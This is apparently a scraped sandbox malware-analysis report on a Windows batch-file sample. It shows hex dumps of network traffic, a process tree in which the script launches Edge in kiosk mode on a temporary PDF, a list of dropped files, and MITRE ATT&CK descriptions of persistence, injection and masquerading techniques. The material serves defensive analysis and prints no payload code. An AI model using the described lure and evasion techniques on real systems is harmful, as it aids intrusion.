Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,\|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
2024-12-28 08:45:48 UTC	1390	IN	Data Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44 Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4\|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
2024-12-28 08:45:48 UTC	1390	IN	Data Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G\|?6:{r;iGW
2024-12-28 08:45:48 UTC	1390	IN	Data Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}\|.nw'Gw=n'CSZB=
2024-12-28 08:45:48 UTC	1390	IN	Data Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83 Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%pA8C4qc(>@z1/V\|#Bo4v_mnniN ZKa./<_PBzi7~>v
2024-12-28 08:45:48 UTC	1390	IN	Data Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82 Data Ascii: =K`!3\|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9\|c`rlqIm7n/n$i9xS=qwlVs^\|\|s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
2024-12-28 08:45:48 UTC	1390	IN	Data Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89 Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm\|n9*ENf+y1AQ-9w.Tvm'W:iw\|K.9-6l[/y[}5'y$+H%:Y1/F\
2024-12-28 08:45:48 UTC	1390	IN	Data Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05 Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i\|\|$yfxE?d;VR??p\<Wp;s.IN1 Q9
2024-12-28 08:45:48 UTC	1390	IN	Data Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63 Data Ascii: QNtY\|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?\|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:45:47 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-28 08:45:47 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-28 08:45:48 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 28 Dec 2024 08:45:48 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f9046b78c638c99-EWR alt-svc: h3=":443"; ma=86400
2024-12-28 08:45:48 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1d 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:46:46 UTC	442	OUT	OPTIONS /api/report?cat=bingbusiness HTTP/1.1 Host: bzib.nelreports.net Connection: keep-alive Origin: https://business.bing.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-28 08:46:46 UTC	334	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Kestrel Date: Sat, 28 Dec 2024 08:46:46 GMT Connection: close PMUSER_FORMAT_QS: X-CDN-TraceId: 0.84112317.1735375606.7c8f09a7 Access-Control-Allow-Headers: * Access-Control-Allow-Credentials: false Access-Control-Allow-Methods: GET, OPTIONS, POST Access-Control-Allow-Origin: *

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:46:48 UTC	382	OUT	POST /api/report?cat=bingbusiness HTTP/1.1 Host: bzib.nelreports.net Connection: keep-alive Content-Length: 466 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-28 08:46:48 UTC	466	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 35 39 39 32 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 36 32 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 33 2e 31 30 37 2e 36 2e 31 35 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 31 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 62 69 6e Data Ascii: [{"age":59925,"body":{"elapsed_time":2623,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"13.107.6.158","status_code":401,"type":"http.error"},"type":"network-error","url":"https://business.bin
2024-12-28 08:46:48 UTC	334	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Kestrel Date: Sat, 28 Dec 2024 08:46:48 GMT Connection: close PMUSER_FORMAT_QS: X-CDN-TraceId: 0.84112317.1735375608.7c8f1ac7 Access-Control-Allow-Headers: * Access-Control-Allow-Credentials: false Access-Control-Allow-Methods: GET, OPTIONS, POST Access-Control-Allow-Origin: *

Target ID:	0
Start time:	03:45:27
Start date:	28/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FLKCAS1DzH.bat" "
Imagebase:	0x7ff70d0b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	03:45:36
Start date:	28/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\996293227.pdf
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	03:45:41
Start date:	28/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6536 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:6
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	9
Start time:	03:45:42
Start date:	28/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6772 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	15
Start time:	03:45:45
Start date:	28/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7740 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8
Imagebase:	0x7ff63af80000
File size:	1'255'976 bytes
MD5 hash:	76C58E5BABFE4ACF0308AA646FC0F416
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	19
Start time:	03:45:58
Start date:	28/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	21
Start time:	03:46:06
Start date:	28/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	22
Start time:	03:46:07
Start date:	28/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2064,i,10732426211297958071,16910545883878642092,262144 /prefetch:3
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	23
Start time:	03:46:37
Start date:	28/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6928 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FLKCAS1DzH.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\06db188f-2317-46c6-968d-1f012d2ecfbb.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0d97d65f-d7f6-48cc-85a3-58093ee47f2a.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\72acd4a6-9d28-4446-9491-3f53488acdf5.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\852d4fb3-bbe8-4180-93b5-b7daad6a0100.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8ca2c317-333e-4bc5-aa0b-0fd9ea34668c.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9533d98f-937b-4a47-9918-c9b13fb85b3e.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9a35bc6d-0fe0-4fed-b768-d4b4cfdc4552.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\16cadde9-2c6a-482f-b72e-343b158033be.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676FBAB0-1D74.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676FBAB1-1EA0.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676FBAC6-1D84.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676FBACE-1C14.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Windows Analysis Report
FLKCAS1DzH.bat

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
